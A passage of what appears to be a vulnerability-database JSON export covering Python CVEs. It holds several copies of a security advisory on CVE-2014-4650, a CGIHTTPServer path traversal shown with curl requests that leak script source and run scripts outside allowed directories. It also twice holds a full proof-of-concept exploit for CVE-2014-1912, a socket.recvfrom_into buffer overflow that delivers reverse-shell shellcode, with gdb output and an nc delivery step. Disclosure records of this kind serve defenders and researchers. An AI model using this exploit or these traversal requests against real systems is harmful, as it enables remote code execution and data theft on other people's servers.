contents raw. As translate_path() URL decodes\nthe path, this then succeeds and discloses the CGI script's file\ncontents:\n\n$ curl http://localhost:8000/cgi-bin%2ftest.py\n#!/usr/bin/env python2\nimport json\nimport sys\n\ndb_credentials = \"SECRET\"\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\n\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\nscripts that would normally not be executable. The class normally only\nallows executing CGI scripts that are direct children of one of the\ndirectories listed in cgi_directories. Furthermore, only direct\nsubdirectories of the document root (the current working directory) can\nbe valid CGI directories.\n\nThis can be seen in the following example. Even though the sample server\nshown above includes \"/cgi-bin/subdir\" as part of the request handler's\ncgi_directories, a CGI script named test.py in that directory is not\nexecuted:\n\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\n[...]\n<p>Error code 403.\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\n[...]\n\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\nreturned True. Next, run_cgi() further dissected these paths to perform\nsome sanity checks, thereby mistakenly assuming subdir to be the\nexecutable script's filename and test.py to be path info. As subdir is\nnot an executable file, run_cgi() returns an error message. However, if\nthe forward slash between subdir and test.py is replaced with %2f,\ninvoking the script succeeds:\n\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\n{\"text\": \"This is a Test\"}\n\nThis is because neither is_cgi() nor run_cgi() URL decode the path\nduring processing until run_cgi() tries to determine whether the target\nscript is an executable file. More specifically, as subdir%2ftest.py\ndoes not contain a forward slash, it is not split into the script name\nsubdir and path info test.py, as in the previous example.\n\nSimilarly, using URL encoded forward slashes, executables outside of a\nCGI directory can be executed:\n\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\n{\"text\": \"This is a Test\"}\n\n\nWorkaround\n==========\n\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\nvariant that first URL decodes the supplied path, for example:\n\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\n def is_cgi(self):\n self.path = urllib.unquote(self.path)\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\n\n\nFix\n===\n\nUpdate to the latest Python version from the Mercurial repository at\nhttp://hg.python.org/cpython/\n\n\nSecurity Risk\n=============\n\nThe vulnerability can be used to gain access to the contents of CGI\nbinaries or the source code of CGI scripts. This may reveal sensitve\ninformation, for example access credentials. This can greatly help\nattackers in mounting further attacks and is therefore considered to\npose a high risk. Furthermore attackers may be able to execute code that\nwas not intended to be executed. However, this is limited to files\nstored in the server's working directory or in its subdirectories.\n\nThe CGIHTTPServer code does contain this warning:\n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\"\nEven when used on a local computer this may allow other local users to\nexecute code in the context of another user.\n\n\nTimeline\n========\n\n2014-04-07 Vulnerability identified\n2014-06-11 Customer approved disclosure to vendor\n2014-06-11 Vendor notified\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\n and addressed it in public source code repository\n2014-06-23 CVE number requested\n2014-06-25 CVE number assigned\n2014-06-26 Advisory released\n\n\nReferences\n==========\n\nhttp://bugs.python.org/issue21766\n\n\nRedTeam Pentesting GmbH\n=======================\n\nRedTeam Pentesting offers individual penetration tests, short pentests,\nperformed by a team of specialised IT-security experts. Hereby, security\nweaknesses in company networks or products are uncovered and can be\nfixed immediately.\n\nAs there are only few experts in this field, RedTeam Pentesting wants to\nshare its knowledge and enhance the public knowledge with research in\nsecurity related areas. The results are made available as public\nsecurity advisories.\n\nMore information about RedTeam Pentesting can be found at\nhttps://www.redteam-pentesting.de.\n\n\n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\nDennewartstr. 25-27 Fax : +49 241 510081-99\n52068 Aachen https://www.redteam-pentesting.de\nGermany Registergericht: Aachen HRB 14004\nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:44", "description": "\nPython - socket.recvfrom_into() Remote Buffer Overflow", "edition": 1, "published": "2014-02-24T00:00:00", "title": "Python - socket.recvfrom_into() Remote Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "modified": "2014-02-24T00:00:00", "id": "EXPLOITPACK:8E7AE717DB9D8AE0105415BFDE08CC6D", "href": "", "sourceData": "#!/usr/bin/env python\n\n'''\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\n# Date: 21/02/2014\n# Exploit Author: @sha0coder\n# Vendor Homepage: python.org\n# Version: python2.7 and python3\n# Tested on: linux 32bit + python2.7\n# CVE : CVE-2014-1912\n\n\n\nsocket.recvfrom_into() remote buffer overflow Proof of concept\nby @sha0coder\n\nTODO: rop to evade stack nx \n\n\n(gdb) x/i $eip\n=> 0x817bb28:\tmov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol\n 0x817bb2b:\ttest BYTE PTR [eax+0x55],0x40\n 0x817bb2f:\tjne 0x817bb38 -->\n ...\n 0x817bb38:\tmov eax,DWORD PTR [eax+0xa4] <--- eax full control again\n 0x817bb3e:\ttest eax,eax\n 0x817bb40:\tjne 0x817bb58 -->\n ...\n 0x817bb58:\tmov DWORD PTR [esp],ebx\n 0x817bb5b:\tcall eax <--------------------- indirect fucktion call ;)\n\n\n$ ./pyrecvfrominto.py \n\tegg file generated\n\n$ cat egg | nc -l 8080 -vv\n\n... when client connects ... or wen we send the evil buffer to the server ...\n\n0x0838591c in ?? ()\n1: x/5i $eip\n=> 0x838591c:\tint3 \t\t\t<--------- LANDED!!!!!\n 0x838591d:\txor eax,eax\n 0x838591f:\txor ebx,ebx\n 0x8385921:\txor ecx,ecx\n 0x8385923:\txor edx,edx\n\n'''\n\nimport struct\n\ndef off(o):\n\treturn struct.pack('L',o)\n\n\nreverseIP = '\\xc0\\xa8\\x04\\x34' #'\\xc0\\xa8\\x01\\x0a'\nreversePort = '\\x7a\\x69'\n\n\n#shellcode from exploit-db.com, (remove the sigtrap)\nshellcode = \"\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\"\\\n\t\t\t\"\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a\"\\\n\t\t\t\"\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\"\\\n\t\t\t\"\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68\"+\\\n\t\t\treverseIP+\"\\x66\\x68\"+reversePort+\"\\x66\\x53\\xfe\"\\\n\t\t\t\"\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\"\\\n\t\t\t\"\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe\"\\\n\t\t\t\"\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31\"\\\n\t\t\t\"\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\\\n\t\t\t\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\"\\\n\t\t\t\"\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd\"\\\n\t\t\t\"\\x80\"\n\n\nshellcode_sz = len(shellcode)\n\nprint 'shellcode sz %d' % shellcode_sz\n\n\nebx = 0x08385908\nsc_off = 0x08385908+20\n\npadd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'\n\n''' \n +------------+----------------------+ +--------------------+\n | | | | |\n V | | V |\n'''\nbuff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\n\n\nprint 'buff sz: %s' % len(buff)\nopen('egg','w').write(buff)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T20:05:35", "description": "Python CGIHTTPServer Encoded Path Traversal. CVE-2014-4650. Webapps exploits for multiple platform", "published": "2014-06-27T00:00:00", "type": "exploitdb", "title": "Python CGIHTTPServer Encoded Path Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "EDB-ID:33894", "href": "https://www.exploit-db.com/exploits/33894/", "sourceData": "Advisory: Python CGIHTTPServer File Disclosure and Potential Code\r\n Execution\r\n\r\nThe CGIHTTPServer Python module does not properly handle URL-encoded\r\npath separators in URLs. This may enable attackers to disclose a CGI\r\nscript's source code or execute arbitrary CGI scripts in the server's\r\ndocument root.\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Python CGIHTTPServer\r\nAffected Versions:\r\n 2.7 - 2.7.7,\r\n 3.2 - 3.2.4,\r\n 3.3 - 3.3.2,\r\n 3.4 - 3.4.1,\r\n 3.5 pre-release\r\nFixed Versions:\r\n 2.7 rev b4bab0788768,\r\n 3.2 rev e47422855841,\r\n 3.3 rev 5676797f3a3e,\r\n 3.4 rev 847e288d6e93,\r\n 3.5 rev f8b3bb5eb190\r\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\r\nSecurity Risk: high\r\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\r\nAdvisory Status: published\r\nCVE: CVE-2014-4650\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe CGIHTTPServer module defines a request-handler class, interface\r\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\r\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\r\nrun CGI scripts.\r\n\r\n(from the Python documentation)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\r\nCGI scripts. A sample server script in Python may look like the\r\nfollowing:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\n\r\nimport CGIHTTPServer\r\nimport BaseHTTPServer\r\n\r\nif __name__ == \"__main__\":\r\n server = BaseHTTPServer.HTTPServer\r\n handler = CGIHTTPServer.CGIHTTPRequestHandler\r\n server_address = (\"\", 8000)\r\n # Note that only /cgi-bin will work:\r\n handler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"]\r\n httpd = server(server_address, handler)\r\n httpd.serve_forever()\r\n------------------------------------------------------------------------\r\n\r\nThis server should execute any scripts located in the subdirectory\r\n\"cgi-bin\". A sample CGI script can be placed in that directory, for\r\nexample a script like the following:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = \"SECRET\"\r\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\r\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\r\n------------------------------------------------------------------------\r\n\r\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\r\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\r\n\r\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\r\n[...]\r\n def do_GET(self):\r\n \"\"\"Serve a GET request.\"\"\"\r\n f = self.send_head()\r\n if f:\r\n try:\r\n self.copyfile(f, self.wfile)\r\n finally:\r\n f.close()\r\n\r\n def do_HEAD(self):\r\n \"\"\"Serve a HEAD request.\"\"\"\r\n f = self.send_head()\r\n if f:\r\n f.close()\r\n\r\n def translate_path(self, path):\r\n [...]\r\n path = posixpath.normpath(urllib.unquote(path))\r\n words = path.split('/')\r\n words = filter(None, words)\r\n path = os.getcwd()\r\n [...]\r\n\r\nThe CGIHTTPRequestHandler class inherits, among others, the methods\r\ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The\r\nclass overrides send_head() and implements several new methods, such as\r\ndo_POST(), is_cgi() and run_cgi():\r\n\r\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n[...]\r\n def do_POST(self):\r\n [...]\r\n if self.is_cgi():\r\n self.run_cgi()\r\n else:\r\n self.send_error(501, \"Can only POST to CGI scripts\")\r\n\r\n def send_head(self):\r\n \"\"\"Version of send_head that support CGI scripts\"\"\"\r\n if self.is_cgi():\r\n return self.run_cgi()\r\n else:\r\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\r\n\r\n def is_cgi(self):\r\n [...]\r\n collapsed_path = _url_collapse_path(self.path)\r\n dir_sep = collapsed_path.find('/', 1)\r\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\r\n if head in self.cgi_directories:\r\n self.cgi_info = head, tail\r\n return True\r\n return False\r\n[...]\r\n def run_cgi(self):\r\n \"\"\"Execute a CGI script.\"\"\"\r\n dir, rest = self.cgi_info\r\n\r\n [...]\r\n\r\n # dissect the part after the directory name into a script name &\r\n # a possible additional path, to be stored in PATH_INFO.\r\n i = rest.find('/')\r\n if i >= 0:\r\n script, rest = rest[:i], rest[i:]\r\n else:\r\n script, rest = rest, ''\r\n\r\n scriptname = dir + '/' + script\r\n scriptfile = self.translate_path(scriptname)\r\n if not os.path.exists(scriptfile):\r\n self.send_error(404, \"No such CGI script (%r)\" % scriptname)\r\n return\r\n if not os.path.isfile(scriptfile):\r\n self.send_error(403, \"CGI script is not a plain file (%r)\" %\r\n scriptname)\r\n return\r\n [...]\r\n[...]\r\n\r\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\r\ncalls is_cgi() to determine whether the requested path is to be executed\r\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\r\nnormalize the path, i.e. remove extraneous slashes (/),current directory\r\n(.), or parent directory (..) elements, taking care not to permit\r\ndirectory traversal below the document root. The is_cgi() function\r\nreturns True when the first path element is contained in the\r\ncgi_directories list. As _url_collaps_path() and is_cgi() never URL\r\ndecode the path, replacing the forward slash after the CGI directory in\r\nthe URL to a CGI script with the URL encoded variant %2f leads to\r\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\r\nsend_head() then invoke its parent's send_head() method which translates\r\nthe URL path to a file system path using the translate_path() method and\r\nthen outputs the file's contents raw. As translate_path() URL decodes\r\nthe path, this then succeeds and discloses the CGI script's file\r\ncontents:\r\n\r\n$ curl http://localhost:8000/cgi-bin%2ftest.py\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = \"SECRET\"\r\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\r\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\r\n\r\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\r\nscripts that would normally not be executable. The class normally only\r\nallows executing CGI scripts that are direct children of one of the\r\ndirectories listed in cgi_directories. Furthermore, only direct\r\nsubdirectories of the document root (the current working directory) can\r\nbe valid CGI directories.\r\n\r\nThis can be seen in the following example. Even though the sample server\r\nshown above includes \"/cgi-bin/subdir\" as part of the request handler's\r\ncgi_directories, a CGI script named test.py in that directory is not\r\nexecuted:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\r\n[...]\r\n<p>Error code 403.\r\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\r\n[...]\r\n\r\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\r\nreturned True. Next, run_cgi() further dissected these paths to perform\r\nsome sanity checks, thereby mistakenly assuming subdir to be the\r\nexecutable script's filename and test.py to be path info. As subdir is\r\nnot an executable file, run_cgi() returns an error message. However, if\r\nthe forward slash between subdir and test.py is replaced with %2f,\r\ninvoking the script succeeds:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\r\n{\"text\": \"This is a Test\"}\r\n\r\nThis is because neither is_cgi() nor run_cgi() URL decode the path\r\nduring processing until run_cgi() tries to determine whether the target\r\nscript is an executable file. More specifically, as subdir%2ftest.py\r\ndoes not contain a forward slash, it is not split into the script name\r\nsubdir and path info test.py, as in the previous example.\r\n\r\nSimilarly, using URL encoded forward slashes, executables outside of a\r\nCGI directory can be executed:\r\n\r\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\r\n{\"text\": \"This is a Test\"}\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\r\nvariant that first URL decodes the supplied path, for example:\r\n\r\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\r\n def is_cgi(self):\r\n self.path = urllib.unquote(self.path)\r\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to the latest Python version from the Mercurial repository at\r\nhttp://hg.python.org/cpython/\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability can be used to gain access to the contents of CGI\r\nbinaries or the source code of CGI scripts. This may reveal sensitve\r\ninformation, for example access credentials. This can greatly help\r\nattackers in mounting further attacks and is therefore considered to\r\npose a high risk. Furthermore attackers may be able to execute code that\r\nwas not intended to be executed. However, this is limited to files\r\nstored in the server's working directory or in its subdirectories.\r\n\r\nThe CGIHTTPServer code does contain this warning:\r\n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\"\r\nEven when used on a local computer this may allow other local users to\r\nexecute code in the context of another user.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-04-07 Vulnerability identified\r\n2014-06-11 Customer approved disclosure to vendor\r\n2014-06-11 Vendor notified\r\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\r\n and addressed it in public source code repository\r\n2014-06-23 CVE number requested\r\n2014-06-25 CVE number assigned\r\n2014-06-26 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://bugs.python.org/issue21766\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n\r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\r\nDennewartstr. 25-27 Fax : +49 241 510081-99\r\n52068 Aachen https://www.redteam-pentesting.de\r\nGermany Registergericht: Aachen HRB 14004\r\nGesch\u0102\u00a4ftsf\u0102\u017ahrer: Patrick Hof, Jens Liebchen", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/33894/"}, {"lastseen": "2016-02-03T15:41:10", "description": "Python socket.recvfrom_into() - Remote Buffer Overflow. CVE-2014-1912. Remote exploit for linux platform", "published": "2014-02-24T00:00:00", "type": "exploitdb", "title": "Python socket.recvfrom_into - Remote Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1912"], "modified": "2014-02-24T00:00:00", "id": "EDB-ID:31875", "href": "https://www.exploit-db.com/exploits/31875/", "sourceData": "#!/usr/bin/env python\r\n\r\n'''\r\n# Exploit Title: python socket.recvfrom_into() remote buffer overflow\r\n# Date: 21/02/2014\r\n# Exploit Author: @sha0coder\r\n# Vendor Homepage: python.org\r\n# Version: python2.7 and python3\r\n# Tested on: linux 32bit + python2.7\r\n# CVE : CVE-2014-1912\r\n\r\n\r\n\r\nsocket.recvfrom_into() remote buffer overflow Proof of concept\r\nby @sha0coder\r\n\r\nTODO: rop to evade stack nx \r\n\r\n\r\n(gdb) x/i $eip\r\n=> 0x817bb28:\tmov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol\r\n 0x817bb2b:\ttest BYTE PTR [eax+0x55],0x40\r\n 0x817bb2f:\tjne 0x817bb38 -->\r\n ...\r\n 0x817bb38:\tmov eax,DWORD PTR [eax+0xa4] <--- eax full control again\r\n 0x817bb3e:\ttest eax,eax\r\n 0x817bb40:\tjne 0x817bb58 -->\r\n ...\r\n 0x817bb58:\tmov DWORD PTR [esp],ebx\r\n 0x817bb5b:\tcall eax <--------------------- indirect fucktion call ;)\r\n\r\n\r\n$ ./pyrecvfrominto.py \r\n\tegg file generated\r\n\r\n$ cat egg | nc -l 8080 -vv\r\n\r\n... when client connects ... or wen we send the evil buffer to the server ...\r\n\r\n0x0838591c in ?? ()\r\n1: x/5i $eip\r\n=> 0x838591c:\tint3 \t\t\t<--------- LANDED!!!!!\r\n 0x838591d:\txor eax,eax\r\n 0x838591f:\txor ebx,ebx\r\n 0x8385921:\txor ecx,ecx\r\n 0x8385923:\txor edx,edx\r\n\r\n'''\r\n\r\nimport struct\r\n\r\ndef off(o):\r\n\treturn struct.pack('L',o)\r\n\r\n\r\nreverseIP = '\\xc0\\xa8\\x04\\x34' #'\\xc0\\xa8\\x01\\x0a'\r\nreversePort = '\\x7a\\x69'\r\n\r\n\r\n#shellcode from exploit-db.com, (remove the sigtrap)\r\nshellcode = \"\\xcc\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\"\\\r\n\t\t\t\"\\xb0\\x66\\xb3\\x01\\x51\\x6a\\x06\\x6a\"\\\r\n\t\t\t\"\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\"\\\r\n\t\t\t\"\\xc6\\xb0\\x66\\x31\\xdb\\xb3\\x02\\x68\"+\\\r\n\t\t\treverseIP+\"\\x66\\x68\"+reversePort+\"\\x66\\x53\\xfe\"\\\r\n\t\t\t\"\\xc3\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\"\\\r\n\t\t\t\"\\xe1\\xcd\\x80\\x31\\xc9\\xb1\\x03\\xfe\"\\\r\n\t\t\t\"\\xc9\\xb0\\x3f\\xcd\\x80\\x75\\xf8\\x31\"\\\r\n\t\t\t\"\\xc0\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\\\r\n\t\t\t\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\"\\\r\n\t\t\t\"\\x89\\xe1\\x52\\x89\\xe2\\xb0\\x0b\\xcd\"\\\r\n\t\t\t\"\\x80\"\r\n\r\n\r\nshellcode_sz = len(shellcode)\r\n\r\nprint 'shellcode sz %d' % shellcode_sz\r\n\r\n\r\nebx = 0x08385908\r\nsc_off = 0x08385908+20\r\n\r\npadd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'\r\n\r\n''' \r\n +------------+----------------------+ +--------------------+\r\n | | | | |\r\n V | | V |\r\n'''\r\nbuff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;)\r\n\r\n\r\nprint 'buff sz: %s' % len(buff)\r\nopen('egg','w').write(buff)\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31875/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:25", "description": "", "published": "2014-06-27T00:00:00", "type": "packetstorm", "title": "Python CGIHTTPServer File Disclosure / Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "PACKETSTORM:127241", "href": "https://packetstormsecurity.com/files/127241/Python-CGIHTTPServer-File-Disclosure-Code-Execution.html", "sourceData": "`Advisory: Python CGIHTTPServer File Disclosure and Potential Code \nExecution \n \nThe CGIHTTPServer Python module does not properly handle URL-encoded \npath separators in URLs. This may enable attackers to disclose a CGI \nscript's source code or execute arbitrary CGI scripts in the server's \ndocument root. \n \nDetails \n======= \n \nProduct: Python CGIHTTPServer \nAffected Versions: \n2.7 - 2.7.7, \n3.2 - 3.2.4, \n3.3 - 3.3.2, \n3.4 - 3.4.1, \n3.5 pre-release \nFixed Versions: \n2.7 rev b4bab0788768, \n3.2 rev e47422855841, \n3.3 rev 5676797f3a3e, \n3.4 rev 847e288d6e93, \n3.5 rev f8b3bb5eb190 \nVulnerability Type: File Disclosure, Directory Traversal, Code Execution \nSecurity Risk: high \nVendor URL: https://docs.python.org/2/library/cgihttpserver.html \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008 \nAdvisory Status: published \nCVE: CVE-2014-4650 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650 \n \n \nIntroduction \n============ \n \nThe CGIHTTPServer module defines a request-handler class, interface \ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits \nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also \nrun CGI scripts. \n \n(from the Python documentation) \n \n \nMore Details \n============ \n \nThe CGIHTTPServer module can be used to set up a simple HTTP server with \nCGI scripts. A sample server script in Python may look like the \nfollowing: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env python2 \n \nimport CGIHTTPServer \nimport BaseHTTPServer \n \nif __name__ == \"__main__\": \nserver = BaseHTTPServer.HTTPServer \nhandler = CGIHTTPServer.CGIHTTPRequestHandler \nserver_address = (\"\", 8000) \n# Note that only /cgi-bin will work: \nhandler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"] \nhttpd = server(server_address, handler) \nhttpd.serve_forever() \n------------------------------------------------------------------------ \n \nThis server should execute any scripts located in the subdirectory \n\"cgi-bin\". A sample CGI script can be placed in that directory, for \nexample a script like the following: \n \n------------------------------------------------------------------------ \n#!/usr/bin/env python2 \nimport json \nimport sys \n \ndb_credentials = \"SECRET\" \nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\") \nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"})) \n------------------------------------------------------------------------ \n \nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler \nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler: \n \nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): \n[...] \ndef do_GET(self): \n\"\"\"Serve a GET request.\"\"\" \nf = self.send_head() \nif f: \ntry: \nself.copyfile(f, self.wfile) \nfinally: \nf.close() \n \ndef do_HEAD(self): \n\"\"\"Serve a HEAD request.\"\"\" \nf = self.send_head() \nif f: \nf.close() \n \ndef translate_path(self, path): \n[...] \npath = posixpath.normpath(urllib.unquote(path)) \nwords = path.split('/') \nwords = filter(None, words) \npath = os.getcwd() \n[...] \n \nThe CGIHTTPRequestHandler class inherits, among others, the methods \ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The \nclass overrides send_head() and implements several new methods, such as \ndo_POST(), is_cgi() and run_cgi(): \n \nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): \n[...] \ndef do_POST(self): \n[...] \nif self.is_cgi(): \nself.run_cgi() \nelse: \nself.send_error(501, \"Can only POST to CGI scripts\") \n \ndef send_head(self): \n\"\"\"Version of send_head that support CGI scripts\"\"\" \nif self.is_cgi(): \nreturn self.run_cgi() \nelse: \nreturn SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self) \n \ndef is_cgi(self): \n[...] \ncollapsed_path = _url_collapse_path(self.path) \ndir_sep = collapsed_path.find('/', 1) \nhead, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:] \nif head in self.cgi_directories: \nself.cgi_info = head, tail \nreturn True \nreturn False \n[...] \ndef run_cgi(self): \n\"\"\"Execute a CGI script.\"\"\" \ndir, rest = self.cgi_info \n \n[...] \n \n# dissect the part after the directory name into a script name & \n# a possible additional path, to be stored in PATH_INFO. \ni = rest.find('/') \nif i >= 0: \nscript, rest = rest[:i], rest[i:] \nelse: \nscript, rest = rest, '' \n \nscriptname = dir + '/' + script \nscriptfile = self.translate_path(scriptname) \nif not os.path.exists(scriptfile): \nself.send_error(404, \"No such CGI script (%r)\" % scriptname) \nreturn \nif not os.path.isfile(scriptfile): \nself.send_error(403, \"CGI script is not a plain file (%r)\" % \nscriptname) \nreturn \n[...] \n[...] \n \nFor HTTP GET requests, do_GET() first invokes send_head(). That method \ncalls is_cgi() to determine whether the requested path is to be executed \nas a CGI script. The is_cgi() method uses _url_collapse_path() to \nnormalize the path, i.e. remove extraneous slashes (/),current directory \n(.), or parent directory (..) elements, taking care not to permit \ndirectory traversal below the document root. The is_cgi() function \nreturns True when the first path element is contained in the \ncgi_directories list. As _url_collaps_path() and is_cgi() never URL \ndecode the path, replacing the forward slash after the CGI directory in \nthe URL to a CGI script with the URL encoded variant %2f leads to \nis_cgi() returning False. This will make CGIHTTPRequestHandler's \nsend_head() then invoke its parent's send_head() method which translates \nthe URL path to a file system path using the translate_path() method and \nthen outputs the file's contents raw. As translate_path() URL decodes \nthe path, this then succeeds and discloses the CGI script's file \ncontents: \n \n$ curl http://localhost:8000/cgi-bin%2ftest.py \n#!/usr/bin/env python2 \nimport json \nimport sys \n \ndb_credentials = \"SECRET\" \nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\") \nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"})) \n \nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI \nscripts that would normally not be executable. The class normally only \nallows executing CGI scripts that are direct children of one of the \ndirectories listed in cgi_directories. Furthermore, only direct \nsubdirectories of the document root (the current working directory) can \nbe valid CGI directories. \n \nThis can be seen in the following example. Even though the sample server \nshown above includes 